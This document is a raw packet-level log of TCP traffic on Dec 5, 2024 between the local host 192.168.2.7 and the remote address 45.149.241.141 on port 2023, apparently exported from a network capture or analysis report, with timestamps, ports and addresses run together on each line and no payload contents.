                                                                                                              Dec 5, 2024 10:39:26.056802988 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.056973934 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.057950020 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.058003902 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.058070898 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.059058905 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.059102058 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.059132099 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.060242891 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.060288906 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.060380936 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.061599970 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.061614037 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.061640024 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.062515020 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.062551975 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.062608957 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.063796043 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.063821077 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.063843966 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.064806938 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.064847946 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.064914942 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.066083908 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.066134930 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.066272974 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.067069054 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.067111015 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.067153931 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.068197966 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.068243980 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.068317890 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.069402933 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.069430113 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.069447994 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.070522070 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.070574045 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.070664883 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.071609020 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.071655989 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.071738958 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.072812080 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.072865009 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.072978020 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.074002028 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.074054003 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.074110031 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.075215101 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.075264931 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.075342894 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.076342106 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.076390028 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.076534986 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.077531099 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.077635050 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.077919960 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.078670979 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.078712940 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.078785896 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.079710007 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.079751968 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.079786062 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.080852032 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.080899000 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.080960989 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.081945896 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.081993103 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.082047939 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.083110094 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.083153963 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.083292007 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.084253073 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.084292889 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.084302902 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.085360050 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.085419893 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.217549086 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.217672110 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.217751026 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.218198061 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.218211889 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.218271017 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.219233990 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.219542027 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.219556093 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.219588995 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.220546961 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.220560074 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.220608950 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.221695900 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.221738100 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.221791983 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.222841978 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.222893953 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.222990036 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.223964930 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.224014997 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.224101067 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.225177050 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.225189924 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.225228071 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.226217031 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.226229906 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.226259947 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.227302074 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.227322102 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.227338076 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.227926970 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.227967978 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.228111029 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.229697943 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.229739904 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.229818106 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.230221987 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.230259895 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.230271101 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.231410027 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.231434107 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.231448889 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.232485056 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.232527018 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.232618093 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.233623981 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.233665943 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.233808041 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.234796047 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.234847069 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.234987974 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.235918045 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.235980988 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.236020088 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.237458944 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.237520933 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.237591982 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.238248110 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.238286972 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.238312960 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.239357948 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.239396095 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.239478111 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.240541935 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.240556955 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.240585089 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.241655111 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.241697073 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.241784096 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.242778063 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.242820024 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.242830992 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.243936062 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.243974924 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.244008064 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.245114088 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.245160103 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.245177984 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.246212006 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.246249914 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.246316910 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.247354031 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.247392893 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.247428894 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.248553038 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.248594046 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.248663902 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.249742985 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.249780893 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.249880075 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.250792980 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.250828981 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.250914097 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.251926899 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.251960993 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.252032995 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.253081083 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.253117085 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.253197908 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.254219055 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.254261017 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.254348993 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.255369902 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.255412102 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.255469084 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.256468058 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.256504059 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.256583929 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.257667065 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.257713079 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.257716894 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.258832932 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.258872986 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.258913040 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.259958029 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.259993076 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.260032892 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.261029005 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.261071920 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.261099100 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.262227058 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.262268066 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.262361050 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.263364077 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.263415098 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.263523102 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.264556885 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.264599085 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.264609098 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.265608072 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.265640020 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.265706062 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.267308950 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.267334938 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.267353058 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.267914057 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.267956018 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.267986059 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.268764973 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.269057035 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.269097090 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.269180059 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.270207882 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.270251036 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.270287037 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.271428108 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.271471024 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.271475077 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.272454023 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.272496939 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.272507906 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.273638964 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.273680925 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.273739100 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.274832010 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.274868965 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.274940968 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.275964975 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.276004076 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.276021004 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.276526928 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.318696976 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.408982992 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.409113884 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.409152985 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.409746885 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.409795046 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.409841061 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.410461903 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.410666943 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.410702944 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.411638021 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.411725998 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.411765099 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.412743092 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.412899017 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.412940979 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.413913965 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.414042950 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.414092064 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.415055037 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.415153027 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.415191889 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.416183949 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.416307926 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.416353941 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.417433023 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.417586088 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.417624950 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.418450117 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.418540001 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.418584108 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.419610023 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.419717073 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.419761896 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.420737982 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.420852900 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.420892954 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.421870947 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.421993971 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.422032118 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.423027992 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.423130989 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.423167944 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.424169064 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.424418926 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.424458981 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.425370932 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.425440073 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.425497055 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.426517010 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.426599979 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.426637888 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.427624941 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.427772999 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.427810907 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.428739071 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.428885937 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.428942919 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.429893017 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.429961920 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.430005074 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.431024075 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.431178093 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.431219101 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.432173967 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.432279110 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.432317972 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.433306932 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.433443069 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.433489084 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.433854103 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.433902979 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.434457064 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.434552908 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.434597969 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.435636044 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.435730934 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.435775995 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.436732054 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.436805964 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.436851025 CET498522023192.168.2.745.149.241.141
                                                                                                              Dec 5, 2024 10:39:26.438121080 CET20234985245.149.241.141192.168.2.7
                                                                                                              Dec 5, 2024 10:39:26.438357115 CET20234985245.149.241.141192.168.2.7
